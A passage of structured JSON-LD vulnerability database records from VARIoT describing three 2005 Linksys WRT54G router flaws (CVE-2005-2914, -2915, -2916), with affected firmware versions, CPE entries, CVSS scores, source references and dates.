"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0095",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.04.4"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "89353"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.04.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2914"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "89353"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2914",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-14123",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2914",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-134",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-14123",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14123"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ezconfig.asp in Linksys WRT54G router 3.01.03, 3.03.6, non-default configurations of 2.04.4, and possibly other versions, does not use an authentication initialization function, which allows remote attackers to obtain encrypted configuration information and, if the key is known, modify the configuration. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "BID",
"id": "89353"
},
{
"db": "VULHUB",
"id": "VHN-14123"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2914",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G ROUTER REMOTE ADMINISTRATION FIXED ENCRYPTION KEY VULNERABILITY",
"trust": 0.6
},
{
"db": "BID",
"id": "89353",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-14123",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14123"
},
{
"db": "BID",
"id": "89353"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"id": "VAR-200509-0095",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14123"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T13:26:00.634000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2914"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026amp;type=vulnerabilities"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14123"
},
{
"db": "BID",
"id": "89353"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14123"
},
{
"db": "BID",
"id": "89353"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-14T00:00:00",
"db": "VULHUB",
"id": "VHN-14123"
},
{
"date": "2005-09-14T00:00:00",
"db": "BID",
"id": "89353"
},
{
"date": "2005-09-14T21:03:00",
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"date": "2005-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14123"
},
{
"date": "2016-07-06T14:34:00",
"db": "BID",
"id": "89353"
},
{
"date": "2008-09-05T20:52:58.890000",
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Configuration Information Disclosure Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
],
"trust": 0.6
}
}
VAR-200509-0096
Vulnerability from variot - Updated: 2023-12-18 13:26ezconfig.asp in Linksys WRT54G router 3.01.03, 3.03.6, non-default configurations of 2.04.4, and possibly other versions, uses weak encryption (XOR encoding with a fixed byte mask) for configuration information, which could allow attackers to decrypt the information and possibly re-encrypt it in conjunction with CVE-2005-2914. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0096",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.04.4_non_default"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "89351"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.04.4_non_default:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2915"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "89351"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2915",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-14124",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2915",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-117",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-14124",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14124"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ezconfig.asp in Linksys WRT54G router 3.01.03, 3.03.6, non-default configurations of 2.04.4, and possibly other versions, uses weak encryption (XOR encoding with a fixed byte mask) for configuration information, which could allow attackers to decrypt the information and possibly re-encrypt it in conjunction with CVE-2005-2914. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "BID",
"id": "89351"
},
{
"db": "VULHUB",
"id": "VHN-14124"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2915",
"trust": 2.0
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G ROUTER REMOTE ADMINISTRATION FIXED ENCRYPTION KEY VULNERABILITY",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117",
"trust": 0.6
},
{
"db": "BID",
"id": "89351",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-14124",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14124"
},
{
"db": "BID",
"id": "89351"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"id": "VAR-200509-0096",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14124"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T13:26:00.656000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2915"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026amp;type=vulnerabilities"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14124"
},
{
"db": "BID",
"id": "89351"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14124"
},
{
"db": "BID",
"id": "89351"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-14T00:00:00",
"db": "VULHUB",
"id": "VHN-14124"
},
{
"date": "2005-09-14T00:00:00",
"db": "BID",
"id": "89351"
},
{
"date": "2005-09-14T21:03:00",
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"date": "2005-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14124"
},
{
"date": "2016-07-06T14:34:00",
"db": "BID",
"id": "89351"
},
{
"date": "2008-09-05T20:52:59.047000",
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"date": "2005-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G ezconfig.asp Weak coding vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
],
"trust": 0.6
}
}
VAR-200509-0097
Vulnerability from variot - Updated: 2023-12-18 12:47Linksys WRT54G 3.01.03, 3.03.6, 4.00.7, and possibly other versions before 4.20.7, does not verify user authentication until after an HTTP POST request has been processed, which allows remote attackers to (1) modify configuration using restore.cgi or (2) upload new firmware using upgrade.cgi. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router. cgi to modify configuration or (2) upload new firmware using upgrade.cgi
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0097",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "4.00.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "89357"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:4.00.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2916"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "89357"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2916",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-14125",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2916",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-119",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-14125",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14125"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G 3.01.03, 3.03.6, 4.00.7, and possibly other versions before 4.20.7, does not verify user authentication until after an HTTP POST request has been processed, which allows remote attackers to (1) modify configuration using restore.cgi or (2) upload new firmware using upgrade.cgi. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router. cgi to modify configuration or (2) upload new firmware using upgrade.cgi",
